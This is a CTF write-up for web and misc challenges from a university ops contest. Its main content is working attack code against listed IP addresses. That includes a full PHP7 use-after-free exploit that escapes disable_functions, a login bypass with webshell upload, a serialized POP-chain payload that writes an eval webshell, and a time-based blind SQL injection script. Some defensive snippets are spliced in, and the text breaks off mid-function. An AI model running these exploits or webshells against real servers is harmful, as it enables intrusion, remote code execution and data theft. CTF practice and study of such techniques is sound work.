web security, ctf

EIS University Ops & Maintenance Contest writeup (WP)

WEB

ezbypass

http://111.186.57.61:10101/

<?php
if(isset($_GET['src']))
{
    highlight_file(__FILE__);
}

eval($_GET['cmd']);

Obviously eval() gives command execution, but it can't be that easy; a look at phpinfo shows that, sure enough, a lot of functions are banned:

disable_functions : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,mb_send_mail,putenv,error_log,apache_setenv

This brought to mind the known ways of bypassing PHP's disable_functions; I also noticed that someone else had uploaded ant_x64.so, and a Baidu search turns up the AntSword plugin for bypassing disabled functions.

Since AntSword can connect directly here and happens to have a bypass plugin, that is the easiest route. See https://github.com/Medicean/as_bypass_php_disable_functions

Connect, start the plugin, and pick any method that isn't disabled.
error_log, mail, putenv and friends are banned, so the usual disable_functions bypasses don't work; the following method also gets around the restriction.
Reference: https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass
Script:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import base64

exp = """
<?php
    pwn($_REQUEST['shell']); 
    //pwn('/readflag');
    function pwn($cmd) {
        global $abc, $helper;
        function str2ptr(&$str, $p = 0, $s = 8) {
            $address = 0;
            for($j = $s-1; $j >= 0; $j--) {
                $address <<= 8;
                $address |= ord($str[$p+$j]);
            }
            return $address;
        }
        function ptr2str($ptr, $m = 8) {
            $out = "";
            for ($i=0; $i < $m; $i++) {
                $out .= chr($ptr & 0xff);
                $ptr >>= 8;
            }
            return $out;
        }
        function write(&$str, $p, $v, $n = 8) {
            $i = 0;
            for($i = 0; $i < $n; $i++) {
                $str[$p + $i] = chr($v & 0xff);
                $v >>= 8;
            }
        }
        function leak($addr, $p = 0, $s = 8) {
            global $abc, $helper;
            write($abc, 0x68, $addr + $p - 0x10);
            $leak = strlen($helper->a);
            if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
            return $leak;
        }
        function parse_elf($base) {
            $e_type = leak($base, 0x10, 2);
            $e_phoff = leak($base, 0x20);
            $e_phentsize = leak($base, 0x36, 2);
            $e_phnum = leak($base, 0x38, 2);
            for($i = 0; $i < $e_phnum; $i++) {
                $header = $base + $e_phoff + $i * $e_phentsize;
                $p_type  = leak($header, 0, 4);
                $p_flags = leak($header, 4, 4);
                $p_vaddr = leak($header, 0x10);
                $p_memsz = leak($header, 0x28);
                if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                    # handle pie
                    $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                    $data_size = $p_memsz;
                } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                    $text_size = $p_memsz;
                }
            }
            if(!$data_addr || !$text_size || !$data_size)
                return false;
            return [$data_addr, $text_size, $data_size];
        }
        function get_basic_funcs($base, $elf) {
            list($data_addr, $text_size, $data_size) = $elf;
            for($i = 0; $i < $data_size / 8; $i++) {
                $leak = leak($data_addr, $i * 8);
                if($leak - $base > 0 && $leak - $base < $text_size) {
                    $deref = leak($leak);
                    # 'constant' constant check
                    if($deref != 0x746e6174736e6f63)
                        continue;
                } else continue;
                $leak = leak($data_addr, ($i + 4) * 8);
                if($leak - $base > 0 && $leak - $base < $text_size) {
                    $deref = leak($leak);
                    # 'bin2hex' constant check
                    if($deref != 0x786568326e6962)
                        continue;
                } else continue;
                return $data_addr + $i * 8;
            }
        }
        function get_binary_base($binary_leak) {
            $base = 0;
            $start = $binary_leak & 0xfffffffffffff000;
            for($i = 0; $i < 0x1000; $i++) {
                $addr = $start - 0x1000 * $i;
                $leak = leak($addr, 0, 7);
                if($leak == 0x10102464c457f) { # ELF header
                    return $addr;
                }
            }
        }
        function get_system($basic_funcs) {
            $addr = $basic_funcs;
            do {
                $f_entry = leak($addr);
                $f_name = leak($f_entry, 0, 6);
                if($f_name == 0x6d6574737973) { # system
                    return leak($addr + 8);
                }
                $addr += 0x20;
            } while($f_entry != 0);
            return false;
        }
        class ryat {
            var $ryat;
            var $chtg;
            function __destruct()
            {
                $this->chtg = $this->ryat;
                $this->ryat = 1;
            }
        }
        class Helper {
            public $a, $b, $c, $d;
        }
        if(stristr(PHP_OS, 'WIN')) {
            die('This PoC is for *nix systems only.');
        }
        $n_alloc = 10; # increase this value if you get segfaults
        $contiguous = [];
        for($i = 0; $i < $n_alloc; $i++)
            $contiguous[] = str_repeat('A', 79);
        $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
        $out = unserialize($poc);
        gc_collect_cycles();
        $v = [];
        $v[0] = ptr2str(0, 79);
        unset($v);
        $abc = $out[2][0];
        $helper = new Helper;
        $helper->b = function ($x) { };
        if(strlen($abc) == 79 || strlen($abc) == 0) {
            die("UAF failed");
        }
        # leaks
        $closure_handlers = str2ptr($abc, 0);
        $php_heap = str2ptr($abc, 0x58);
        $abc_addr = $php_heap - 0xc8;
        # fake value
        write($abc, 0x60, 2);
        write($abc, 0x70, 6);
        # fake reference
        write($abc, 0x10, $abc_addr + 0x60);
        write($abc, 0x18, 0xa);
        $closure_obj = str2ptr($abc, 0x20);
        $binary_leak = leak($closure_handlers, 8);
        if(!($base = get_binary_base($binary_leak))) {
            die("Couldn't determine binary base address");
        }
        if(!($elf = parse_elf($base))) {
            die("Couldn't parse ELF header");
        }
        if(!($basic_funcs = get_basic_funcs($base, $elf))) {
            die("Couldn't get basic_functions address");
        }
        if(!($zif_system = get_system($basic_funcs))) {
            die("Couldn't get zif_system address");
        }
        # fake closure object
        $fake_obj_offset = 0xd0;
        for($i = 0; $i < 0x110; $i += 8) {
            write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
        }
        # pwn
        write($abc, 0x20, $abc_addr + $fake_obj_offset);
        write($abc, 0xd0 + 0x38, 1, 4); # internal func type
        write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
        ($helper->b)($cmd);
        exit();
    }
    ?>
"""


url = "http://111.186.57.61:10101/?"

def upload():
    # Drop the PHP file into /tmp through the eval() sink; the body travels base64-encoded in a POST field
    requests.post(
        url + "cmd=file_put_contents('/tmp/.berl1n.php',base64_decode($_POST['aa']));",
        data={"aa": base64.b64encode(exp.encode('utf-8'))})

def system(cmd):
    # include() the dropped file; its pwn() takes the command from $_REQUEST['shell']
    r = requests.get(url, params={"cmd": "include('/tmp/.berl1n.php');", "shell": cmd})
    return r.text

if __name__ == '__main__':
    upload()
    # system("ls /")
    flag = 'flag: ' + system('/readflag')
    print(flag)


ezupload

http://111.186.57.61:10501/
The challenge is a login page with no registration endpoint, so I guessed SQL injection but couldn't get in no matter what. Checking the source revealed a leaked .login.php.swp; after recovering it:

<?php
#error_reporting(0);
session_start();
include "config.php";

$username = $_POST['username'];
$password = $_POST['password'];
if (isset($username)){
    $sql = "select password from user where name=?";
    if ($stmt = $mysqli->prepare($sql)) {
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($dpasswd);
        $stmt->fetch();
        if ($dpasswd === $password){
            $_SESSION['login'] = 1;
            header("Location: /upload.php");
        }else{
            die("login failed");
        }
        $stmt->close();
    }
}else{
    header("Location: /index.php");
}

$mysqli->close();

The flaw is in the password check: when $_POST['password'] is absent, $password is null. Likewise, when the SQL query returns no rows, $dpasswd stays null, so the strict comparison passes and the login succeeds.
Send a POST with any username and no password field at all to log in.
A 302 means the login succeeded; now open upload.php.
Files can be uploaded. The check blocks php, but phtml, php3, php5, php7 and similar extensions get past it; the content check only looks at the file header, so a GIF89a header is enough to get the file accepted.
The upload returns an array; the script displays it, though it doesn't show in the intercepted response.
Upload result captured in the proxy:

I originally thought the temp directory would be accessible, but it isn't; tried upload, which didn't work either; a directory scan found nothing. Damn, the file was uploaded but I didn't know where... finally found it under uploads. Not careful enough.

Upload succeeded.
Connect with AntSword.
Script:

import requests

# upload file
#
session = requests.session()
url = 'http://111.186.57.123:10501'
data = {'username': "1'or%201='1#"}   # any username works; the password field is deliberately left out

# cookies = {'SL_G_WPT_TO':'zh', 'SL_GWPT_Show_Hide_tmp':'1', 'SL_wptGlobTipTmp':'1', 'login':'1' , 'PHPSESSID':'69ad892324f39fb1015b503ef0258d89'}

index = session.post(url=url+'/login.php', data=data)
# print(index.text)

# MUMA.jpg: the webshell behind a GIF89a header, uploaded under a .phtml name to pass the extension check
upload = session.post(url=url+'/upload.php', files={"avatar": ("berl1n.phtml", open("MUMA.jpg", "rb"))}).text
print(upload)

# file = session.get(url+'/uploads/berl1n.phtml').text
# print(file)

flag = session.post(url+'/uploads/berl1n.phtml', data={'MUMA': "system('/readflag');"}).text
print(flag)


ezjava

http://111.186.57.43:10301/ezjava/
The challenge ships its source; download, unzip and decompile the classes. The code is simple, so the bug is presumably in a dependency.

It uses fastjson-1.2.47.
This is the vulnerability disclosed during the HW (护网) exercise: fastjson <= 1.2.47 deserialization.
Reference: https://github.com/CaijiOrz/fastjson-1.2.47-RCE
Reference: https://yaofeifly.github.io/2019/07/28/fastjson/
Reproduce fastjson-1.2.47 against the live instance.
Open a port on a VPS to catch the shell that comes back.
ezjava: flag{jndi_injection_by_ldap_3232}

ezpop

http://111.186.57.123:10401/?src=
Source:

<?php
error_reporting(0);

class A{

    protected $store;  // protected property

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null)
    {
        $this->key    = $key;
        $this->store  = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents)  // cleanContents takes an array
    {
        $cachedProperties = array_flip([                  // swap keys and values
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) { // iterate contents; if object is an array, keep only the keys present in both arrays
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage()
    {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save()
    {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct()
    {
        if (! $this->autosave) {
            $this->save();
        }
    }
}

class B{

    protected function getExpireTime($expire): int
    {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string
    {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string
    {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool
    {
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire   = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // creation failed
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            // data compression
            $data = gzcompress($data, 3);
        }

        $data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

Deserialization: build a POP chain.
A has a __destruct method, so A is what we deserialize. When A::autosave == false, A::save() is called.
A::save() calls A::store->set(); setting A::store to a B object gets B::set() invoked.

B::set() writes a file, and both the file name (path included) and the second half of the content are controllable. The first half of the content contains an exit(), which stops the written webshell from executing.
This can be bypassed with base64_decode plus php://filter.
See phith0n's blog post 谈一谈php://filter的妙用 (on the clever uses of php://filter).

PHP's base64_decode discards every illegal character and decodes the remaining legal characters as one new string; that is what makes the bypass work.
Writing through php://filter/write=convert.base64-decode decodes the content before it hits disk, so the exit() is neutralised.

Now trace back how $filename and $data are handled.

$filename:
Line 80 (of the original listing) calls B::getCacheKey($name), which concatenates $this->options['prefix'] . $name to form the filename.

$data:
Line 99 prepends the first half, which is bypassed as described above.
The branch at line 94 need not be entered; line 92 calls B::serialize($value), where $value is the parameter of B::set($name, $value, $expire = null).
B::serialize($value) calls B::options['serialize']() on $value.
Now look at $value.
$value is actually the return value of A::getForStorage(), which returns json_encode([A::cleanContents(A::cache), A::complete]);.
A::cleanContents(A::cache) applies a filter, while A::complete is easier to control, so write the shellcode straight into it.
Since $value is a JSON string and the JSON framing characters ([ ] , ") are not legal base64, base64_decode extracts the shellcode straight out of the JSON.
So base64-encode the shellcode and set B::options['serialize'] to base64_decode.
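The base64 alignment that the "qaq" padding in the PoC takes care of can be checked with this added Python model (not part of the original writeup): it mimics PHP's non-strict base64_decode, rebuilds what B::set() writes with expire = 0, applies the write filter, and measures where the webshell lands. The defensive lesson is that an exit() prefix is no guard once the caller controls the stream wrapper. Names such as php_base64_decode and shell_offset are mine.

```python
import base64

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def php_base64_decode(data: bytes) -> bytes:
    """Model of PHP's non-strict base64_decode() and of the
    convert.base64-decode stream filter: bytes outside the alphabet
    ('=' included) are skipped, and whatever is left is decoded as one
    continuous 6-bit stream, so alignment depends on every legal
    character seen so far, including the ones in the exit() header."""
    out = bytearray()
    acc = bits = 0
    for ch in data.decode("latin-1"):
        idx = B64_ALPHABET.find(ch)
        if idx < 0:
            continue
        acc = ((acc << 6) | idx) & 0xFFFF
        bits += 6
        if bits >= 8:
            bits -= 8
            out.append((acc >> bits) & 0xFF)
    return bytes(out)


def legal_chars(data: bytes) -> int:
    """Number of characters the decoder will actually consume."""
    return sum(ch in B64_ALPHABET for ch in data.decode("latin-1"))


# Prefix B::set() prepends with $expire = 0, exactly as in the challenge source.
CACHE_HEADER = b"<?php\n//000000000000\n exit();?>\n"

SHELL = b'<?php @eval($_POST["muma"]);?>'   # the page's webshell


def file_written_by_set(complete: str) -> bytes:
    """Reproduce the write path: $value = json_encode([A::cache, A::complete])
    with A::cache = [], then options['serialize'] = base64_decode strips the
    JSON framing and yields raw bytes, which follow the header; finally the
    php://filter/write=convert.base64-decode prefix decodes the whole stream
    once more on its way to disk."""
    json_value = b'[[],"' + complete.encode() + b'"]'
    before_filter = CACHE_HEADER + php_base64_decode(json_value)
    return php_base64_decode(before_filter)


def shell_offset(padding: str) -> int:
    """Offset of SHELL in the final file for a given plaintext padding
    (the PoC uses 'qaq'); -1 if the shell did not survive the decode."""
    inner = base64.b64encode(SHELL).decode()
    complete = base64.b64encode((padding + inner).encode()).decode()
    return file_written_by_set(complete).find(SHELL)


def padding_needed() -> int:
    """Legal characters the header contributes, rounded up to a group of 4:
    php + // + twelve zeros + exit = 21, so three padding bytes are needed."""
    return (-legal_chars(CACHE_HEADER)) % 4


if __name__ == "__main__":
    print("legal chars in exit() header:", legal_chars(CACHE_HEADER))  # 21
    print("padding needed:", padding_needed())                         # 3
    print("shell offset without padding:", shell_offset(""))           # -1
    print("shell offset with 'qaq':", shell_offset("qaq"))             # 18
```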

poc:

<?php
/*
.........
*/
class A{

    protected $store;  

    protected $key;

    protected $expire;
    public function __construct($store, $key = 'flysystem', $expire = null)
    {
        $this->key    = $key;
        $this->store  = $store;
        $this->expire = $expire;
    }
}
class B{

    protected function getExpireTime($expire): int
    {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string
    {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string
    {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool
    {
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire   = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // creation failed
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            // data compression
            $data = gzcompress($data, 3);
        }

        $data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

$b = new B();
$b->options = array('serialize' => "base64_decode", 'data_compress' => false);
$b->options['prefix'] = "php://filter/write=convert.base64-decode/resource=uploads/1";
$b->writeTimes = 0;

$a = new A($store = $b, $key = ".php", $expire = 0);
$a->autosave = false;
$a->cache = array();
// pad so the base64 character count lines up to a multiple of 4
$a->complete = base64_encode("qaq" . base64_encode('<?php @eval($_POST["muma"]);?>'));

echo urlencode(serialize($a));

payload:

http://111.186.57.123:10401/?data=O%3A1%3A%22A%22%3A6%3A%7Bs%3A8%3A%22%00%2A%00store%22%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A7%3A%22options%22%3Ba%3A3%3A%7Bs%3A9%3A%22serialize%22%3Bs%3A13%3A%22base64_decode%22%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3Bs%3A6%3A%22prefix%22%3Bs%3A59%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3Duploads%2F1%22%3B%7Ds%3A10%3A%22writeTimes%22%3Bi%3A0%3B%7Ds%3A6%3A%22%00%2A%00key%22%3Bs%3A4%3A%22.php%22%3Bs%3A9%3A%22%00%2A%00expire%22%3Bi%3A0%3Bs%3A8%3A%22autosave%22%3Bb%3A0%3Bs%3A5%3A%22cache%22%3Ba%3A0%3A%7B%7Ds%3A8%3A%22complete%22%3Bs%3A60%3A%22cWFxUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lKdGRXMWhJbDBwT3o4Kw%3D%3D%22%3B%7D

Created successfully; get a shell and read the flag.

ezwaf

http://111.186.57.61:10601/?src

<?php
include "config.php";

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

function escape($arr)
{
    global $mysqli;
    $newarr = array();
    foreach($arr as $key=>$val)
    {
        if (!is_array($val))
        {
            $newarr[$key] = mysqli_real_escape_string($mysqli, $val);
        }
    }
    return $newarr;
}

$_GET= escape($_GET);

if (isset($_GET['name']))
{
    $name = $_GET['name'];
    mysqli_query($mysqli, "select age from user where name='$name'");
}else if(isset($_GET['age']))
{
    $age = $_GET['age'];
    mysqli_query($mysqli, "select name from user where age=$age");
}

The code wraps every GET value in mysqli_real_escape_string(), which escapes single and double quotes.
But the age parameter is used as a bare number, without quotes, so it's a numeric injection and a blind injection works directly. Blind injection code:

import requests
from urllib.parse import quote

flag = ''
pos = 1
url = 'http://111.186.57.61:10601/?age='
while True:
    for i in range(0, 128):
        try:
            # res = requests.get(url+quote('-1 or if((ascii(substring((select group_concat(table_name) from information_schema.columns where table_schema=database()) from %d for 1))=%d),sleep(4),1)'%(pos,i)),headers={'Content-Length':''},timeout=2)
            # flag_xdd
            # res = requests.get(url+quote('-1 or if((ascii(substring((select group_concat(column_name) from information_schema.columns where table_name=0x666c61675f786464) from %d for 1))=%d),sleep(4),1)'%(pos,i)),headers={'Content-Length':''},timeout=2)
            # flag_32122
            res = requests.get(url+quote('-1 or if((ascii(substring((select group_concat(flag_32122) from flag_xdd ) from %d for 1))=%d),sleep(4),1)'%(pos,i)),headers={'Content-Length':''},timeout=2)
        except requests.exceptions.Timeout:
            # the 2s timeout fired, i.e. sleep(4) ran: the guess for this position is right
            flag += chr(i)
            print(flag)
            break
    else:
        # no character matched at this position: the string has ended
        print("oops")
        break
    pos = pos + 1

Because quotes are filtered, the where clause uses hex encoding instead of string literals to get around it.
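To see the same thing from the defender's side, here is an added log-scanning example (not part of the original writeup): it parses constructed Apache access-log lines, checks that the age parameter is the plain integer the query expects, and reports the injection vocabulary of the blind-injection payload above. The log lines, IPs and timestamps are constructed samples; function names are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines (sample data, not from the challenge host);
# line 2 carries the page's time-based payload, line 3 the table-enumeration variant.
SAMPLE_LOG = """
10.0.0.5 - - [12/Aug/2020:10:01:02 +0800] "GET /?age=23 HTTP/1.1" 200 51
10.0.0.9 - - [12/Aug/2020:10:01:03 +0800] "GET /?age=-1%20or%20if((ascii(substring((select%20group_concat(flag_32122)%20from%20flag_xdd)%20from%201%20for%201))=102),sleep(4),1) HTTP/1.1" 200 51
10.0.0.9 - - [12/Aug/2020:10:01:08 +0800] "GET /?age=-1%20or%20if((ascii(substring((select%20group_concat(table_name)%20from%20information_schema.columns%20where%20table_schema=database())%20from%201%20for%201))=102),sleep(4),1) HTTP/1.1" 200 51
10.0.0.5 - - [12/Aug/2020:10:01:09 +0800] "GET /?name=alice HTTP/1.1" 200 51
10.0.0.7 - - [12/Aug/2020:10:01:10 +0800] "GET /?age=1e3 HTTP/1.1" 200 51
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
# What the application's query needs: an integer, nothing else.
INTEGER_RE = re.compile(r"-?\d+")
# Vocabulary of the payload used above; "sleep"/"benchmark" mark a time-based probe.
SQL_TOKENS = re.compile(
    r"\b(sleep|benchmark|if|ascii|substring|select|union|information_schema)\b", re.I
)


def analyse_line(line: str):
    """Return a finding dict for a request whose age parameter is not the
    integer the query expects, or None for clean / irrelevant lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    if "age" not in params:
        return None
    age = params["age"][0]           # parse_qs has already percent-decoded it
    if INTEGER_RE.fullmatch(age):
        return None                  # a plain number: the only legitimate shape
    tokens = sorted({t.lower() for t in SQL_TOKENS.findall(age)})
    return {
        "ip": m["ip"],
        "time": m["ts"],
        "age": age,
        "tokens": tokens,
        "time_based": bool({"sleep", "benchmark"} & set(tokens)),
    }


def scan(log_text: str) -> list:
    """Findings for every line of an access log, in file order."""
    return [f for f in map(analyse_line, log_text.strip().splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        kind = "time-based blind injection" if finding["time_based"] else "non-integer age"
        print(f'{finding["time"]} {finding["ip"]} {kind}: {finding["age"]!r} tokens={finding["tokens"]}')
```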

ezcms

http://111.186.57.61:10201/guanfangxinwen/

https://blog.csdn.net/qq_23936389/article/details/84967434

misc

misc1

The download is a txt file that looks like garbage when opened; open it in a hex editor, switch the encoding from ASCII to EBCDIC, and the flag is at the end.


misc2

#!/usr/bin/env python 
# -*- coding: utf-8 -*- 
import os 
from flask import request 
from flask import Flask 

secret = open('/flag', 'rb') 
os.remove('/flag') 
app = Flask(__name__) 
app.secret_key = '015b9efef8f51c00bcba57ca8c56d77a' 
@app.route('/') 
def index(): 
    return open(__file__).read() 
@app.route("/r", methods=['POST']) 
def r(): 
    data = request.form["data"]  # takes a path; if that file exists, open it and return its contents
    if os.path.exists(data): 
        return open(data).read()  
    return '' 

if __name__ == '__main__': 
    app.run(host='0.0.0.0', port=8000, debug=False)

Because the flag file is deleted right after being opened, read it through the still-open file descriptor to get the flag.
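As an added illustration (not from the writeup), this Linux-only Python snippet reproduces the app's open-then-delete start-up on a constructed temp file, reads the data back through /proc/self/fd, lists descriptors that point at unlinked files, and shows the fix of reading the secret into memory and closing it before serving. Function names are mine.

```python
import os
import tempfile

SAMPLE_SECRET = b"flag{constructed-sample}\n"   # constructed stand-in for /flag


def open_then_unlink(content: bytes = SAMPLE_SECRET):
    """Mirror the app's start-up on a temp file: open the secret, keep the
    handle, delete the name. Returns (open file object, deleted path)."""
    fd, path = tempfile.mkstemp(prefix="flag-")
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    secret = open(path, "rb")   # secret = open('/flag', 'rb')
    os.remove(path)             # os.remove('/flag')
    return secret, path


def read_deleted_via_fd() -> bytes:
    """The data is still reachable through /proc/self/fd/<n>: the path fails
    os.path.exists(), the fd link passes it, and open() on the link returns
    the unlinked file's contents, which is exactly what the app's
    os.path.exists(data) -> open(data).read() hands back."""
    secret, path = open_then_unlink()
    try:
        if os.path.exists(path):
            raise RuntimeError("the path should be gone")
        fd_link = f"/proc/self/fd/{secret.fileno()}"
        if not os.path.exists(fd_link):       # no procfs: nothing to show
            return b""
        with open(fd_link, "rb") as f:
            return f.read()
    finally:
        secret.close()


def deleted_open_files() -> list:
    """Defender's check: descriptors of this process whose target was unlinked."""
    found = []
    for name in os.listdir("/proc/self/fd"):
        try:
            target = os.readlink(f"/proc/self/fd/{name}")
        except OSError:
            continue                          # the listing's own fd is already closed
        if target.endswith(" (deleted)"):
            found.append((int(name), target))
    return found


def load_then_close(path: str) -> bytes:
    """The fix: read the secret into memory and drop the descriptor before the
    server starts, so nothing in /proc/self/fd points at it any more."""
    with open(path, "rb") as f:
        data = f.read()
    os.remove(path)
    return data


def fix_demo() -> tuple:
    """Run load_then_close on a fresh temp file; returns (data, path still exists)."""
    fd, path = tempfile.mkstemp(prefix="flag-")
    with os.fdopen(fd, "wb") as f:
        f.write(SAMPLE_SECRET)
    return load_then_close(path), os.path.exists(path)


if __name__ == "__main__":
    print(read_deleted_via_fd())
    print(fix_demo())
```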

misc3

Download the HTML file; the browser console shows

&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&zwnj;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&#8203;&zwnj;&#8203;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&zwnj;&zwnj;&#8203;&#8203;&#8203;&zwnj;&zwnj;&#8203;&zwnj;&#8203;&#8203;&#8203;&#8203;&#8203;&zwnj;&#8203;

Only two distinct characters appear; replace them with 0 and 1 and convert the bits to text:

0110011001101100011000010110011101111011011001010011001001100001001110010110001100111000011000100011000100110001001101110011010101100101001101100011011001100011011001100011001000110001011001100011100000110101001110010011001101100010011000110011100000110101011000100110011000111001001100110011100101111101
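An added decoder for this step (not from the writeup): it maps &zwnj; to 0 and &#8203; to 1 (raw U+200C / U+200B characters are accepted too), turns the bit string into ASCII, and carries the page's 304-bit string so the result can be checked. Function names are mine.

```python
import html

ZWNJ = "\u200c"   # &zwnj;   -> bit 0
ZWSP = "\u200b"   # &#8203;  -> bit 1


def zero_width_to_bits(text: str) -> str:
    """Accept the entity form seen in the page source or the raw invisible
    characters; every other character is ignored."""
    decoded = html.unescape(text)
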